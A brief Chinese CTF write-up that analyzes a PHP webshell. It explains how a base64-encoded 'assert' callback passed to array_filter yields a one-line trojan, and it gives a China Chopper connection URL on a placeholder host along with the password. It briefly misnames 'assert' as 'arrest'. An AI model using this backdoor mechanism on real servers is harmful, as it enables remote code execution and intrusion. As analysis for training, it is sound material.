【WEB】WebShell代码分析溯源(第4题)
查看到可以webshell后定位到源代码:
这个的用法:
get网址中传入 ?e=YXNzZXJ0 (arrest的base64加密值为YXNzZXJ0)
菜刀连接用法: http://www.xxx.com/3.php?e=YXNzZXJ0
密码:POST
详解:base64_decode()函数主要用于base64的解码,YXNzZXJ0的base64解码后的结果为assert,e接受浏览器传过来的参数,e接受浏览器传过来的参数,arr是个数组,array_filter()函数用回调函数过滤数组中的值,
如果我们传入$e的参数为YXNzZXJ0,这样的话我们的回调函数名就是assert,并且要过滤数组中的每一个参数
就构成了assert($_POST['POST']),常见的一句话木马,直接用菜刀链接即可